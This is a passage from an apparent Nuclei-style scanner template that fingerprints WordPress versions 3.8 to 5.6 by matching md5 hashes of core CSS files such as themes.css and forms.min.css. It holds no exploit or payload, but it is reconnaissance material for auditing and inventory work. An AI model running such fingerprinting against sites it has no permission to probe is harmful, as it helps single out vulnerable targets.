type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"3b8ab0e0e89de6e23fa254fcc917bedf\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"2b6a7f7c36df118e1fa6c53674607fe5\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"edaf8c970a6a15ca0926cb1eba5cca85\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"7a47b05a3d8952e1366b305a9964ceb5\" == md5(body))" - - type: dsl - name: 5.5.1 - dsl: - - "(\"77ea71e2d098778a39ce22cd1d46b850\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"15209b1d60d6b5dc64918d87fd039355\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"41aecf7743c41d3a638a22f06c53a2f8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-editor/style-rtl.css" - matchers: - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"0d0078b5771e9db91b0223bd9d596175\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"0bcf1bfb6aadae7de803ddeb3c060658\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"3985f920257f3d239695bc9278fa799b\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"8177cd68c95cec36f7b3e10fdeee8336\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"c527698d617b7d12502c10fa3c15dc19\" == md5(body))" - - type: dsl - name: 5.5.1 - dsl: - - "(\"9e4c5d344df641c3ccad1cfcf841f941\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"df8d0fcab2428792fe751d8983e9f7d5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"21aa4baf49dde8193561db25b2209c71\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-editor/style.css" - matchers: - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"75fefe34b7f48fae5e586a1a47ae90bf\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"c11c93210abdee789e409376cd0a5c5c\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"943022038ee60fe653ad3661fe5e45f9\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"61ab069aacd4d601a6a2fde14df4e70f\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"480bcf3053b663abbfdafa48493f6374\" == md5(body))" - - type: dsl - name: 5.5.1 - dsl: - - "(\"e1210805da48ace34900897bdc5f26bf\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"cad17c21d91b7f11da688d1e9dce20c5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a85b002b4c0c1e9194944e072a857464\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/editor-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"58f65a696e381a7e74ed02b7c7eb2f88\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"9fe3e6ba7eb849f83f99d4c157a9351f\" == md5(body))" - - type: dsl - name: 4.6.1 - 4.6.20 - dsl: - - "(\"7475bf3300b9b09cfdad9491bca3f215\" == md5(body))" - - type: dsl - name: 4.6 - dsl: - - "(\"097f71ecb19edf4fe945a8afee00c908\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"d8d916dc8eb7de2d93753d2f21482101\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"38772ec68546889e62f4cf28fdcbbde9\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"6f495e61e507d0ed5a7a9de7019b0f4a\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"60b46fe4c022f4124ba8a0507a4abdeb\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"c95fbbd85d14b7f107c9363983ba78ff\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"6e89b5fd71d2d1b815c8bd80353b2dce\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"39461240391db9948d3e7d1ad1abfef4\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"73c479e8517d6f74175bc745fdbb6d35\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"1488f88d9014008bd0dbb170815afe57\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"bee313b104940f32a4a4b7dea5a7b780\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.5 - dsl: - - "(\"e604b03d546da590669bbfe20a0e7bbf\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"f3c72ab81488215a91b0550d202a08ed\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"98bb07383e45aa479177ad8b6e7f49e4\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"083dbc70593847f2e1bf728a58ddd059\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"3d11cdb0e238d76fa865ae1d6929b93c\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"15e61d98724841bd7262998182f3a999\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.4.4 - dsl: - - "(\"340e21ee8bdc8d949bf8f3e619261f3d\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"96d79cf85e8e536a52ea3b2b85f5d688\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"baa7a7a40db081f84136804a07a2e264\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/dashboard-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"62acfa3c0527d48e1f6b05a1e184b342\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"85d54bb343a31b620a1af2d429fc5436\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.7 - dsl: - - "(\"fda0e5ce02c5900dd041baab092d4f3a\" == md5(body))" - - type: dsl - name: 4.9.8 - dsl: - - "(\"77529e7ab55b635462f5dbe80593b7eb\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"e954ddd78c021db65a745bcf468e71bf\" == md5(body))" - - type: dsl - name: 4.9.9 - dsl: - - "(\"8cf004a8a36761cc57ccb97afe9b9b30\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"8091a06d5574edd3c5259643b8af24b3\" == md5(body))" - - type: dsl - name: 4.9.10 - 4.9.16 - dsl: - - "(\"ba0acdd2da464f6c25a8320816f945d9\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"75010bb43088888d3cd66ce3d5093016\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"3d65a0d03b8cf1dccfd86dbb7c4fd1ae\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"34aaa2e3bb0ea2c12c57fb7ab40a3b70\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"74dfbb7f9247575cd6ac455071b2deaf\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d7285996efa524866a6eaaf06cca524b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6f857f13215f9d88f49ecc95ac94b338\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/dashboard.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"ed28009277c6fcc98f9d976aa6eba432\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"151dfe98fe81cf303ddd51228ac6f3d0\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.7 - dsl: - - "(\"6165fb1bb259adcc78c89832a84aff4d\" == md5(body))" - - type: dsl - name: 4.9.8 - dsl: - - "(\"2cb2a8dd236d1e4a362e1b4ca3f2b84b\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"16ae3878586942fdae57e349dcda572e\" == md5(body))" - - type: dsl - name: 4.9.9 - dsl: - - "(\"fd23950196d3732d26a864dbcd4bcb83\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"1ddf24cdfc94b91a28c950825c40c48a\" == md5(body))" - - type: dsl - name: 4.9.10 - 4.9.16 - dsl: - - "(\"7d9026521ee5ae1955003f6bf2693417\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d7a985e8ee7af92319d09bef2a66974b\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"f6b3073e60d1315a6594a871465fc199\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"264b0baf2bceaadaf426043b5c4b57bb\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"78aa4721fac928e8a2fcd160af422530\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b6efc3a3ec922c77cfc008ad47e116ee\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"fa022dfaf91f7cf42fe274cdbe5a7fa2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/themes.min.css" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"ef5290b0b456322ca3ac76b0ab41f054\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"ed740c0a3115880e47cba29134ed6bf8\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"68eb02c6dc043646186b59a360559f0f\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"700790d0f345446ccaf08b3460fe8351\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"d5ddd9e2f523fc6d9aa0293c8bd2391d\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"12ea589ec56cee96417b3af756d724b4\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"eef9e9c791a2a8250df76fcbfe5d17bd\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"5bdad071f9e7cfe1a7a92a62d758bbf1\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"71cdb07b51db8a1db6c2d3f08a0367fa\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"fd2b6396366e80b8299b52064d898c0a\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"601bb2a5a5eea3590273be36a7df9669\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"a5292a41fb788a8a72e883c4c062beaa\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"582c0c210600f719b442959112412c94\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9dadeed9e3d6c25f0a61f15f5187933a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2eccfd95805b80a6a072a4fff8bfd4b0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/themes.css" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"9a0a057b0459eabbdddead7a1e477eec\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"44bafdf96fbd98c93ca4a6564cbe7e93\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"c1abb7c12d4e54061e011ca25c524ed8\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"0528f3a942a205c3b428c17a04b073f8\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"a66b5870f5abf95219e4fde453577ea7\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"a67484679e8fd85db53b9619a2ac8f85\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"faf10f604c6bd3e8e2eb40324b88182e\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"ce3f414694b2c845341d2e3d69130267\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"0f2c9837f4d58bec62e54c49bc2b7794\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"bf0ab9d631a3b25394db5d04866fc1aa\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"828f5d1cd3443c5976270143e77cadf4\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"8658229ae2ce25fd13ff08548675d8ee\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"77beb61918ea32751dac643426d8f3d5\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"9071b556370c3845075580318a236b2f\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"41554444c0f5476bffaeb6a79961f7ea\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ca0d7958e9d46e58cf9d41f957ec91c8\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"c6a5aa2e29f32f44bdce4742fca8f2bb\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"93b7262b1516cf0ec3d539b78c8142e1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b36cac1d32f8b0416c4b6235ac01cd37\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"1d76230edc8f2fddd8983c082db89d8b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"f82245973ba3fd29d15126f8589f00ab\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/themes-rtl.min.css" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"9c4fafeae99d7503e0bee7fb9217c8e9\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"f5a99b541f512e2c0395d7d2b40adb34\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"46c7eef970445884324c035f739ca63a\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"dcaa4244b0f2d289a78e99d3b15d0030\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"df4b24fdec390975a02a7603fafc35b9\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"2b3dd6296037fabf5838dbb7abaf097a\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"5ff3626ce33e65913c4d8953959aa520\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"5976bde31a300bab3a5d50f41b272b61\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d74ee2f93a19ac860cacb90596dcb490\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"cdcc90f54b768a8cd5716b65fff9d435\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"59f537df17030e22fd1e5f56b4d79c84\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"546c91b261d6c87cb01db2444d599cad\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"9811db0e32a5b4eec31edd57406b1273\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d855dc46a4c9159753cae0ffd6940c32\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d638ef49ef6db468d4ee59d08c1eaeb9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/themes-rtl.css" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"ac269b6795e49f5954f2ba2acb9794a4\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"8f0a90ccd54ad9f8b584a77ad5fc4df4\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"b845e2804487a2c5a4b64938a6c431e1\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"3b10683d99f04c4d4a33ed92eda6a1de\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"092db96e6dbef112252d3faf4bf955ad\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"9244c8ce5e9d98581459de46b8b1bcd1\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"169672ec8c16e26871cd0f2374586204\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"c69c734910d5078b179e84f8bf99e5d6\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"ed00d87745e51769e94fb921930d997d\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"4a121a5c6d72c6506750149b8e20ca56\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"80aac0d388f112376bcdb5bd3539d6e5\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"6c675d2f6d9a5c8c81a1ad8bb2f3a790\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"400ee8016213e3c3d97bb05fcb49cdb5\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"3d6bf238e618acab0ba06717265a5968\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"e37a10fd50d81ece6f710c45b3fa1a04\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"032493bd3c26ff357c718c5ee666559e\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"fb563bca5ee580768536fd79f2fe0099\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"1c7c4b87a701db41ce0aabd9588d8c17\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"702259ee1857d24d8fd20e3a9f382f4a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"32ff26d078f6a954a639c00b8ca5f603\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ca3bd63183f371d0a5b7d675605b41ce\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/editor-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"d013264ad3f438d142233a254b1117d7\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"66921114b83a2e737e69f2847b4c9cf3\" == md5(body))" - - type: dsl - name: 4.6.1 - 4.6.20 - dsl: - - "(\"790856d6a811fc7fe402923db7b6a5b4\" == md5(body))" - - type: dsl - name: 4.6 - dsl: - - "(\"325a6c7b04fbd7cf907f383aa5f4de38\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"d7a258aa3ccead8b55aab1b671e065e5\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"e633153dadc9e4941e4f488d3aa837a2\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"78ace8b0870478e309e40a7bbf5e3389\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"c175f45d5829c12ac0be14efac8bb4c7\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"276f2225f21976d22740e82215494856\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"d37ca4ce0e8e1250bb906e69312e665f\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"f8ab93f031c0321ede4c47e7c3089da6\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"ebc9181357a52cab8fab57d71c425834\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"11fac912b46d92d88bd5df1878a2c15d\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"937b3ac77d948c34e7dbe07fefdc624d\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.5 - dsl: - - "(\"4c1a60281755a58f80a47e0813c41eaa\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"1e90009269f457bd921c66553d228318\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"5d6f193d1f5c5adc2323941754c753bc\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"3dbfa38d02be94fdcc892f3a302ac9b9\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f4eea5b8a4b0bc5012d0bc602e7ecd13\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"0bad85ae8ccab5915c8ec59b6d0e6c90\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"c4faa8b5b7b501ba22c6bb57f156a1c9\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b612fa58efa9719e30e8828cf5b7d7cb\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d99ffda66449ebd500441480e4b9a527\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"64c96fc90711e9e0fc3603be28af7127\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/forms-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"47752271f64a9450264075c3388f6c6f\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"7ee4c4a582042409d1324354271dd33a\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"3f3b7c76cbd5221c72b4eee6c87a9308\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"8ed5bd4a43ca6575d2df30bb88cffb91\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"61c801bba389554bae370d73246f94fa\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"76fce113f718ef60c9931f72c13d5f9a\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"6a2feae9bdc28933566c060a1f464556\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"d155c4000f10a61e0793569fcb399998\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"331b72eb0cd5c3c8cc46645befabfdd2\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"12f61c063d0234dbafb11a1c59248249\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.2 - dsl: - - "(\"f7ac8314d571b1c198d0efff920d2bb2\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"38bd662ed5c53ef1b4be39c239bb3c19\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"c7d9a48cde3ec1d9368c4a25b9d9fb5f\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"7103b0149a4e22079def0482495cee6e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"872a1bbe2da03464ac6d8ca1c153a3d5\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"af625d635badd366bc7f303a8dd31f8c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"e07102630daf98355cb00ed5c073dfa7\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a6628e1a25bcafa09aa8b162720ed4b7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/forms.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"321a6177a67ded013d09dbf01acfc720\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"ecb1fcf9fd153be961a297b91d5dbfe5\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"76ca9c78f6d0c3067f1675647bee0e11\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"b6926672577e63afe9b7d0b4aaa4582a\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"85423c8fe3301819eb65ce6b293567e7\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"d8c9fc3fe6bcc0d3e421d07de6d0631a\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"7af49f35c490a278b5d68fd14863fc2a\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"fb7105f56049ea9973bd87e921d05aa2\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"3ca933b7742a2c632bf36dd3b3fda0cd\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"282327fab3ae51f8d9388cd19ffa368f\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.2 - dsl: - - "(\"b0d183adf2d3e85eae32e58276125e9d\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"e358104efa34b7f5f6026d9dcaa746ae\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"f67578c4abafa31a7df8ab3bb1915f3e\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"a547809c0643c57dc1c8d9250eb8c42e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"3c097a0a654b8efcfa9ab5576fdce131\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"2c22663bfcbce25b9621d52d8b86b6cf\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0e54ffaded9432c82c95b9a7a41ce2a7\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"317de2d6d71ca4bd7be900f1441c205e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/edit-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"c74a0e67bc88bb7a74ca50ccf662d82f\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.19 - dsl: - - "(\"a72bd32f3d21c3fcda385af3e8bff5e3\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"500f084226ee39c6b11b9974a65a32f2\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"7860eb75440968af1348895c70aa596a\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"4830ad6b3e3a4090b20262815591a055\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"e9337ef831e8077f4eccc9db76c0db5d\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"b708d4c4a95584ed6d0fbe99398de717\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"cfba250fba322ce18b32d62855fb192f\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"550bf2c8d64a462cd0001b12ab69cef6\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"38495c0fe98ea4771bd1ef698c67fe15\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"498eae5afa7050083856a248dcd22d99\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"322756eb9dfcfc64aafea511d272dd1b\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"8d6da8edc4399924c03d3ab0ece8a652\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"033d42e80b0fe67e673bff455ed0843e\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"2458095adb086c724eaa5b71e9b7e6be\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b5c008d615027d62aeaf41a230356c64\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"626baba6145c91db05e9e385fc0d218a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/edit.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"1f444df7d07ce6cd93e33b6916ab2bf9\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.19 - dsl: - - "(\"36beba49ddd70365704e68b6641cab63\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"8c4b91d038300235db9877d6a4196674\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"32637f3e54e917599672b3c1f00a2a81\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"70c2d4e3ef1aa9773b57a613e0f18688\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - 